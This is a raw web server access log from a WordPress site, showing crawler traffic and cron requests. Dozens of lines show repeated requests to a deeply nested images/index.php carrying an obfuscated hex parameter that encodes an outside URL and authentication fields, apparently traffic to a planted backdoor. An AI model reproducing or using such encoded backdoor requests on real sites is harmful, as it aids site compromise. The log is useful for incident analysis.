51.77.217.11 - - [26/Jul/2026:09:39:16 +0000] "GET /ilia-cigarette-c-55/?add-to-cart=878 HTTP/1.1" 200 34792 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.217.11 - - [26/Jul/2026:09:39:22 +0000] "GET /ilia-cigarette-c-55/?add-to-cart=879 HTTP/1.1" 200 34838 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.217.11 - - [26/Jul/2026:09:39:28 +0000] "GET /ilia-cigarette-c-55/?add-to-cart=889 HTTP/1.1" 200 34769 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
38.177.186.189 - - [26/Jul/2026:09:39:33 +0000] "GET /images/images/images/index.php?ARRAY=7o2230223n313738353036323235332p2231223n22687474703n5p2s5p2s7n733936377631332r6p6172676572732r636p69636o5p2s3s6p633q7068705s636s64655s6n6326743q313738353035383635332q3835633935316463643132303465643062333537643837313133353663646563222p2232223n223837306535663264346663303839646234363435386334663333656535633365222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q34352q35372q36392q37382q38372q3136227q HTTP/1.1" 504 160 "-" "-"
51.77.217.11 - - [26/Jul/2026:09:39:35 +0000] "GET /ilia-cigarette-c-55/?add-to-cart=890 HTTP/1.1" 200 34853 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.217.11 - - [26/Jul/2026:09:39:41 +0000] "GET /ilia-cigarette-c-55/?add-to-cart=893 HTTP/1.1" 200 34837 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.217.11 - - [26/Jul/2026:09:39:46 +0000] "GET /ilia-cigarette-c-55/?add-to-cart=896 HTTP/1.1" 200 34795 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.217.11 - - [26/Jul/2026:09:39:53 +0000] "GET /ilia-cigarette-c-55/?add-to-cart=904 HTTP/1.1" 200 34868 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
38.177.186.189 - - [26/Jul/2026:09:39:55 +0000] "GET /images/images/images/index.php?ARRAY=7o2230223n313738353036323237352p2231223n22687474703n5p2s5p2s7n733936377631332r6p6172676572732r636p69636o5p2s3s6p633q7068705s636s64655s6n6326743q313738353035383637352q3666323435356536623837346265336635313065613236663332336330396330222p2232223n223837306535663264346663303839646234363435386334663333656535633365222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q34352q35372q36392q37382q38372q3136227q HTTP/1.1" 504 160 "-" "-"
51.77.217.11 - - [26/Jul/2026:09:39:59 +0000] "GET /ilia-cigarette-c-55/?add-to-cart=920 HTTP/1.1" 200 34854 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
38.177.186.189 - - [26/Jul/2026:09:40:06 +0000] "POST /wp-cron.php?doing_wp_cron=1785058805.2898900508880615234375 HTTP/1.1" 499 0 "-" "WordPress/7.0; https://www.groatmachinery.com"
51.77.217.11 - - [26/Jul/2026:09:40:06 +0000] "GET /ilia-cigarette-c-55/?add-to-cart=927 HTTP/1.1" 200 34823 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.217.11 - - [26/Jul/2026:09:40:12 +0000] "GET /ilia-cigarette-c-55/?add-to-cart=934 HTTP/1.1" 200 34826 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
38.177.186.189 - - [26/Jul/2026:09:40:17 +0000] "GET /images/images/images/index.php?ARRAY=7o2230223n313738353036323239372p2231223n22687474703n5p2s5p2s7n733936377631332r6p6172676572732r636p69636o5p2s3s6p633q7068705s636s64655s6n6326743q313738353035383639372q6531343735626635383937323230663063393234643136643530373863653238222p2232223n223837306535663264346663303839646234363435386334663333656535633365222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q34352q35372q36392q37382q38372q3136227q HTTP/1.1" 504 160 "-" "-"
51.77.217.11 - - [26/Jul/2026:09:40:18 +0000] "GET /ilia-cigarette-c-55/?add-to-cart=940 HTTP/1.1" 200 34812 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.217.11 - - [26/Jul/2026:09:40:24 +0000] "GET /ilia-cigarette-c-55/?add-to-cart=942 HTTP/1.1" 200 34829 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
38.177.186.189 - - [26/Jul/2026:09:40:39 +0000] "GET /images/images/images/index.php?ARRAY=7o2230223n313738353036323331392p2231223n22687474703n5p2s5p2s7n733936377631332r6p6172676572732r636p69636o5p2s3s6p633q7068705s636s64655s6n6326743q313738353035383731392q3362623038376264313039626433663166656536306661613039333537373035222p2232223n223837306535663264346663303839646234363435386334663333656535633365222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q34352q35372q36392q37382q38372q3136227q HTTP/1.1" 504 160 "-" "-"
38.177.186.189 - - [26/Jul/2026:09:41:01 +0000] "GET /images/images/images/index.php?ARRAY=7o2230223n313738353036323334312p2231223n22687474703n5p2s5p2s7n733936377631332r6p6172676572732r636p69636o5p2s3s6p633q7068705s636s64655s6n6326743q313738353035383734312q6538643765333634313138386133333439373635323930623137353533636336222p2232223n223837306535663264346663303839646234363435386334663333656535633365222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q34352q35372q36392q37382q38372q3136227q HTTP/1.1" 504 160 "-" "-"
38.177.186.189 - - [26/Jul/2026:09:41:23 +0000] "GET /images/images/images/index.php?ARRAY=7o2230223n313738353036323336332p2231223n22687474703n5p2s5p2s7n733936377631332r6p6172676572732r636p69636o5p2s3s6p633q7068705s636s64655s6n6326743q313738353035383736332q3563313138613761343862613963303566646133313264666434653230303436222p2232223n223837306535663264346663303839646234363435386334663333656535633365222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q34352q35372q36392q37382q38372q3136227q HTTP/1.1" 504 160 "-" "-"
38.177.186.189 - - [26/Jul/2026:09:41:45 +0000] "GET /images/images/images/index.php?ARRAY=7o2230223n313738353036323338352p2231223n22687474703n5p2s5p2s7n733936377631332r6p6172676572732r636p69636o5p2s3s6p633q7068705s636s64655s6n6326743q313738353035383738352q3030356161353130383435643562643939343238383562616231616361663862222p2232223n223837306535663264346663303839646234363435386334663333656535633365222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q34352q35372q36392q37382q38372q3136227q HTTP/1.1" 504 160 "-" "-"
38.177.186.189 - - [26/Jul/2026:09:42:07 +0000] "GET /images/images/images/index.php?ARRAY=7o2230223n313738353036323430372p2231223n22687474703n5p2s5p2s7n733936377631332r6p6172676572732r636p69636o5p2s3s6p633q7068705s636s64655s6n6326743q313738353035383830372q3133306536656533373139363661383739326132663936353161313035383561222p2232223n223837306535663264346663303839646234363435386334663333656535633365222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q34352q35372q36392q37382q38372q3136227q HTTP/1.1" 504 160 "-" "-"
38.177.186.189 - - [26/Jul/2026:09:42:24 +0000] "POST /wp-cron.php?doing_wp_cron=1785058943.3492500782012939453125 HTTP/1.1" 499 0 "-" "WordPress/7.0; https://www.groatmachinery.com"
38.177.186.189 - - [26/Jul/2026:09:42:24 +0000] "GET / HTTP/1.1" 301 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36"
38.177.186.189 - - [26/Jul/2026:09:42:26 +0000] "GET / HTTP/1.1" 499 0 "http://38.177.186.189" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36"
38.177.186.189 - - [26/Jul/2026:09:42:27 +0000] "POST /wp-cron.php?doing_wp_cron=1785058946.6942970752716064453125 HTTP/1.1" 499 0 "-" "WordPress/7.0; https://www.groatmachinery.com"
114.119.130.199 - - [26/Jul/2026:09:42:28 +0000] "GET /page/32/ HTTP/1.1" 200 36484 "https://groatmachinery.com/page/32" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
38.177.186.189 - - [26/Jul/2026:09:42:29 +0000] "GET /images/images/images/index.php?ARRAY=7o2230223n313738353036323432392p2231223n22687474703n5p2s5p2s7n733936377631332r6p6172676572732r636p69636o5p2s3s6p633q7068705s636s64655s6n6326743q313738353035383832392q3961336439373836383661666632626433393666353131626531356234646430222p2232223n223837306535663264346663303839646234363435386334663333656535633365222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q34352q35372q36392q37382q38372q3136227q HTTP/1.1" 504 160 "-" "-"
38.177.186.189 - - [26/Jul/2026:09:42:51 +0000] "GET /images/images/images/index.php?ARRAY=7o2230223n313738353036323435312p2231223n22687474703n5p2s5p2s7n733936377631332r6p6172676572732r636p69636o5p2s3s6p633q7068705s636s64655s6n6326743q313738353035383835312q3065343036343166643539386334636366653534636564646234396462646632222p2232223n223837306535663264346663303839646234363435386334663333656535633365222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q34352q35372q36392q37382q38372q3136227q HTTP/1.1" 504 160 "-" "-"
38.177.186.189 - - [26/Jul/2026:09:43:13 +0000] "GET /images/images/images/index.php?ARRAY=7o2230223n313738353036323437332p2231223n22687474703n5p2s5p2s7n733936377631332r6p6172676572732r636p69636o5p2s3s6p633q7068705s636s64655s6n6326743q313738353035383837332q3063636535386338376532333736643464366233626535643032383131663532222p2232223n223837306535663264346663303839646234363435386334663333656535633365222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q34352q35372q36392q37382q38372q3136227q HTTP/1.1" 504 160 "-" "-"
38.177.186.189 - - [26/Jul/2026:09:43:35 +0000] "GET /images/images/images/index.php?ARRAY=7o2230223n313738353036323439352p2231223n22687474703n5p2s5p2s7n733936377631332r6p6172676572732r636p69636o5p2s3s6p633q7068705s636s64655s6n6326743q313738353035383839352q6131616230363330396565303938373736343262353731396232633436336565222p2232223n223837306535663264346663303839646234363435386334663333656535633365222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q34352q35372q36392q37382q38372q3136227q HTTP/1.1" 504 160 "-" "-"
38.177.186.189 - - [26/Jul/2026:09:43:58 +0000] "GET /images/images/images/index.php?ARRAY=7o2230223n313738353036323531382p2231223n22687474703n5p2s5p2s7n733936377631332r6p6172676572732r636p69636o5p2s3s6p633q7068705s636s64655s6n6326743q313738353035383931382q3033313632636633636139613262643964643232643535323139303164636636222p2232223n223837306535663264346663303839646234363435386334663333656535633365222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q34352q35372q36392q37382q38372q3136227q HTTP/1.1" 504 160 "-" "-"
38.177.186.189 - - [26/Jul/2026:09:44:20 +0000] "GET /images/images/images/index.php?ARRAY=7o2230223n313738353036323534302p2231223n22687474703n5p2s5p2s7n733936377631332r6p6172676572732r636p69636o5p2s3s6p633q7068705s636s64655s6n6326743q313738353035383934302q6661386462613232643265303630356566656463356136663062623930333063222p2232223n223837306535663264346663303839646234363435386334663333656535633365222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q34352q35372q36392q37382q38372q3136227q HTTP/1.1" 504 160 "-" "-"
38.177.186.189 - - [26/Jul/2026:09:44:42 +0000] "GET /images/images/images/index.php?ARRAY=7o2230223n313738353036323536322p2231223n22687474703n5p2s5p2s7n733936377631332r6p6172676572732r636p69636o5p2s3s6p633q7068705s636s64655s6n6326743q313738353035383936322q6530656264626565663864313561396238333061323664363063383839626538222p2232223n223837306535663264346663303839646234363435386334663333656535633365222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q34352q35372q36392q37382q38372q3136227q HTTP/1.1" 504 160 "-" "-"
38.177.186.189 - - [26/Jul/2026:09:44:59 +0000] "POST /wp-cron.php?doing_wp_cron=1785059098.4597671031951904296875 HTTP/1.1" 499 0 "-" "WordPress/7.0; https://www.groatmachinery.com"
114.119.133.14 - - [26/Jul/2026:09:44:59 +0000] "GET /mailerlite-newsletter-examples HTTP/1.1" 301 0 "https://groatmachinery.com/page/380" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
38.177.186.189 - - [26/Jul/2026:09:45:02 +0000] "POST /wp-cron.php?doing_wp_cron=1785059101.8358440399169921875000 HTTP/1.1" 499 0 "-" "WordPress/7.0; https://www.groatmachinery.com"
114.119.133.14 - - [26/Jul/2026:09:45:02 +0000] "GET /mailerlite-newsletter-examples HTTP/1.1" 404 26504 "https://groatmachinery.com/page/380" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
38.177.186.189 - - [26/Jul/2026:09:45:05 +0000] "GET /images/images/images/index.php?ARRAY=7o2230223n313738353036323538352p2231223n22687474703n5p2s5p2s7n733936377631332r6p6172676572732r636p69636o5p2s3s6p633q7068705s636s64655s6n6326743q313738353035383938352q3361633361623730373739306661653534313139363963336535626532353333222p2232223n223837306535663264346663303839646234363435386334663333656535633365222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q34352q35372q36392q37382q38372q3136227q HTTP/1.1" 504 160 "-" "-"
43.153.123.3 - - [26/Jul/2026:09:45:11 +0000] "GET / HTTP/1.1" 400 248 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
38.177.186.189 - - [26/Jul/2026:09:45:27 +0000] "GET /images/images/images/index.php?ARRAY=7o2230223n313738353036323630372p2231223n22687474703n5p2s5p2s7n733936377631332r6p6172676572732r636p69636o5p2s3s6p633q7068705s636s64655s6n6326743q313738353035393030372q6139353437336437636439303837316566333639396164353232306230313664222p2232223n223837306535663264346663303839646234363435386334663333656535633365222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q34352q35372q36392q37382q38372q3136227q HTTP/1.1" 504 160 "-" "-"
38.177.186.189 - - [26/Jul/2026:09:45:49 +0000] "GET /images/images/images/index.php?ARRAY=7o2230223n313738353036323632392p2231223n22687474703n5p2s5p2s7n733936377631332r6p6172676572732r636p69636o5p2s3s6p633q7068705s636s64655s6n6326743q313738353035393032392q6662356531663566623463313037326133323462646139643862306137653636222p2232223n223837306535663264346663303839646234363435386334663333656535633365222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q34352q35372q36392q37382q38372q3136227q HTTP/1.1" 504 160 "-" "-"
38.177.186.189 - - [26/Jul/2026:09:46:11 +0000] "GET /images/images/images/index.php?ARRAY=7o2230223n313738353036323635312p2231223n22687474703n5p2s5p2s7n733936377631332r6p6172676572732r636p69636o5p2s3s6p633q7068705s636s64655s6n6326743q313738353035393035312q3432343936613261356332663635336533353837323032343161656430333936222p2232223n223837306535663264346663303839646234363435386334663333656535633365222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q34352q35372q36392q37382q38372q3136227q HTTP/1.1" 504 160 "-" "-"
38.177.186.189 - - [26/Jul/2026:09:46:33 +0000] "GET /images/images/images/index.php?ARRAY=7o2230223n313738353036323637332p2231223n22687474703n5p2s5p2s7n733936377631332r6p6172676572732r636p69636o5p2s3s6p633q7068705s636s64655s6n6326743q313738353035393037332q3132316566393638656331346536323462303739323836366236376235666330222p2232223n223837306535663264346663303839646234363435386334663333656535633365222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q34352q35372q36392q37382q38372q3136227q HTTP/1.1" 504 160 "-" "-"
38.177.186.189 - - [26/Jul/2026:09:46:55 +0000] "GET /images/images/images/index.php?ARRAY=7o2230223n313738353036323639352p2231223n22687474703n5p2s5p2s7n733936377631332r6p6172676572732r636p69636o5p2s3s6p633q7068705s636s64655s6n6326743q313738353035393039352q3235613334633733613239313862333562366230393034653466323361363161222p2232223n223837306535663264346663303839646234363435386334663333656535633365222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q34352q35372q36392q37382q38372q3136227q HTTP/1.1" 504 160 "-" "-"
38.177.186.189 - - [26/Jul/2026:09:47:17 +0000] "GET /images/images/images/index.php?ARRAY=7o2230223n313738353036323731372p2231223n22687474703n5p2s5p2s7n733936377631332r6p6172676572732r636p69636o5p2s3s6p633q7068705s636s64655s6n6326743q313738353035393131372q3661346338623564353663343039313836383234633839376264633666343465222p2232223n223837306535663264346663303839646234363435386334663333656535633365222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q34352q35372q36392q37382q38372q3136227q HTTP/1.1" 504 160 "-" "-"
38.177.186.189 - - [26/Jul/2026:09:47:39 +0000] "GET /images/images/images/index.php?ARRAY=7o2230223n313738353036323733392p2231223n22687474703n5p2s5p2s7n733936377631332r6p6172676572732r636p69636o5p2s3s6p633q7068705s636s64655s6n6326743q313738353035393133392q6462663132373834643937666361326637333336626564396230653435366130222p2232223n223837306535663264346663303839646234363435386334663333656535633365222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q34352q35372q36392q37382q38372q3136227q HTTP/1.1" 504 160 "-" "-"
38.177.186.189 - - [26/Jul/2026:09:48:01 +0000] "GET /images/images/images/index.php?ARRAY=7o2230223n313738353036323736312p2231223n22687474703n5p2s5p2s7n733936377631332r6p6172676572732r636p69636o5p2s3s6p633q7068705s636s64655s6n6326743q313738353035393136312q6361376538633838613163623738643863396639653034303236383531633239222p2232223n223837306535663264346663303839646234363435386334663333656535633365222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q34352q35372q36392q37382q38372q3136227q HTTP/1.1" 504 160 "-" "-"
38.177.186.189 - - [26/Jul/2026:09:48:23 +0000] "GET /images/images/images/index.php?ARRAY=7o2230223n313738353036323738332p2231223n22687474703n5p2s5p2s7n733936377631332r6p6172676572732r636p69636o5p2s3s6p633q7068705s636s64655s6n6326743q313738353035393138332q6237306266343037366330646163663232666364343037656534343232383931222p2232223n223837306535663264346663303839646234363435386334663333656535633365222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q34352q35372q36392q37382q38372q3136227q HTTP/1.1" 504 160 "-" "-"
38.177.186.189 - - [26/Jul/2026:09:48:24 +0000] "POST /wp-cron.php?doing_wp_cron=1785059303.3792979717254638671875 HTTP/1.1" 499 0 "-" "WordPress/7.0; https://www.groatmachinery.com"
114.119.135.229 - - [26/Jul/2026:09:48:24 +0000] "GET /beehiiv-vs-mailchimp/ HTTP/1.1" 301 0 "https://groatmachinery.com/post-sitemap.xml" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
114.119.135.229 - - [26/Jul/2026:09:48:29 +0000] "GET /beehiiv-vs-mailchimp/ HTTP/1.1" 404 26503 "https://groatmachinery.com/post-sitemap.xml" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
38.177.186.189 - - [26/Jul/2026:09:48:45 +0000] "GET /images/images/images/index.php?ARRAY=7o2230223n313738353036323830352p2231223n22687474703n5p2s5p2s7n733936377631332r6p6172676572732r636p69636o5p2s3s6p633q7068705s636s64655s6n6326743q313738353035393230352q3235343739386163616332646434343433626465333461643436663339393465222p2232223n223837306535663264346663303839646234363435386334663333656535633365222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q34352q35372q36392q37382q38372q3136227q HTTP/1.1" 504 160 "-" "-"
38.177.186.189 - - [26/Jul/2026:09:49:08 +0000] "GET /images/images/images/index.php?ARRAY=7o2230223n313738353036323832382p2231223n22687474703n5p2s5p2s7n733936377631332r6p6172676572732r636p69636o5p2s3s6p633q7068705s636s64655s6n6326743q313738353035393232382q3965643432616166306333343033656335373961356663323835373135373563222p2232223n223837306535663264346663303839646234363435386334663333656535633365222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q34352q35372q36392q37382q38372q3136227q HTTP/1.1" 504 160 "-" "-"
216.73.216.206 - - [26/Jul/2026:09:49:23 +0000] "GET /robots.txt HTTP/1.1" 200 84 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
38.177.186.189 - - [26/Jul/2026:09:49:26 +0000] "POST /wp-cron.php?doing_wp_cron=1785059365.7431099414825439453125 HTTP/1.1" 499 0 "-" "WordPress/7.0; https://www.groatmachinery.com"
216.73.216.206 - - [26/Jul/2026:09:49:26 +0000] "GET /sitemap.xml HTTP/1.1" 404 26500 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
38.177.186.189 - - [26/Jul/2026:09:49:30 +0000] "GET /images/images/images/index.php?ARRAY=7o2230223n313738353036323835302p2231223n22687474703n5p2s5p2s7n733936377631332r6p6172676572732r636p69636o5p2s3s6p633q7068705s636s64655s6n6326743q313738353035393235302q3035663364663538346531306534356637316636313230613636633439613536222p2232223n223837306535663264346663303839646234363435386334663333656535633365222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q34352q35372q36392q37382q38372q3136227q HTTP/1.1" 504 160 "-" "-"
38.177.186.189 - - [26/Jul/2026:09:49:52 +0000] "GET /images/images/images/index.php?ARRAY=7o2230223n313738353036323837322p2231223n22687474703n5p2s5p2s7n733936377631332r6p6172676572732r636p69636o5p2s3s6p633q7068705s636s64655s6n6326743q313738353035393237322q6338656461316364323433303562393365306263356130656238363934363464222p2232223n223837306535663264346663303839646234363435386334663333656535633365222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q34352q35372q36392q37382q38372q3136227q HTTP/1.1" 504 160 "-" "-"
38.177.186.189 - - [26/Jul/2026:09:50:08 +0000] "POST /wp-cron.php?doing_wp_cron=1785059407.2883999347686767578125 HTTP/1.1" 499 0 "-" "WordPress/7.0; https://www.groatmachinery.com"
114.119.134.152 - - [26/Jul/2026:09:50:08 +0000] "GET /beehiiv-landing-page-examples HTTP/1.1" 301 0 "https://groatmachinery.com/page/368" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
114.119.134.152 - - [26/Jul/2026:09:50:11 +0000] "GET /beehiiv-landing-page-examples HTTP/1.1" 404 26507 "https://groatmachinery.com/page/368" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
38.177.186.189 - - [26/Jul/2026:09:50:14 +0000] "GET /images/images/images/index.php?ARRAY=7o2230223n313738353036323839342p2231223n22687474703n5p2s5p2s7n733936377631332r6p6172676572732r636p69636o5p2s3s6p633q7068705s636s64655s6n6326743q313738353035393239342q3335396133643164636264363338396138353563396631633830383965336539222p2232223n223837306535663264346663303839646234363435386334663333656535633365222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q34352q35372q36392q37382q38372q3136227q HTTP/1.1" 504 160 "-" "-"
38.177.186.189 - - [26/Jul/2026:09:50:36 +0000] "GET /images/images/images/index.php?ARRAY=7o2230223n313738353036323931362p2231223n22687474703n5p2s5p2s7n733936377631332r6p6172676572732r636p69636o5p2s3s6p633q7068705s636s64655s6n6326743q313738353035393331362q3538643962366631343730376165376135633034366266353861643733643934222p2232223n223837306535663264346663303839646234363435386334663333656535633365222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q34352q35372q36392q37382q38372q3136227q HTTP/1.1" 504 160 "-" "-"
38.177.186.189 - - [26/Jul/2026:09:50:58 +0000] "GET /images/images/images/index.php?ARRAY=7o2230223n313738353036323933382p2231223n22687474703n5p2s5p2s7n733936377631332r6p6172676572732r636p69636o5p2s3s6p633q7068705s636s64655s6n6326743q313738353035393333382q3465343561666336613235363964636165623261333035626264616230616566222p2232223n223837306535663264346663303839646234363435386334663333656535633365222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q34352q35372q36392q37382q38372q3136227q HTTP/1.1" 504 160 "-" "-"
38.177.186.189 - - [26/Jul/2026:09:51:20 +0000] "GET /images/images/images/index.php?ARRAY=7o2230223n313738353036323936302p2231223n22687474703n5p2s5p2s7n733936377631332r6p6172676572732r636p69636o5p2s3s6p633q7068705s636s64655s6n6326743q313738353035393336302q3330613135323964643861363133643532643532656432366263306262366130222p2232223n223837306535663264346663303839646234363435386334663333656535633365222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q34352q35372q36392q37382q38372q3136227q HTTP/1.1" 504 160 "-" "-"
38.177.186.189 - - [26/Jul/2026:09:51:42 +0000] "GET /images/images/images/index.php?ARRAY=7o2230223n313738353036323938322p2231223n22687474703n5p2s5p2s7n733936377631332r6p6172676572732r636p69636o5p2s3s6p633q7068705s636s64655s6n6326743q313738353035393338322q6530316361326437663739663263393732663436323563663530396565643038222p2232223n223837306535663264346663303839646234363435386334663333656535633365222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q34352q35372q36392q37382q38372q3136227q HTTP/1.1" 504 160 "-" "-"
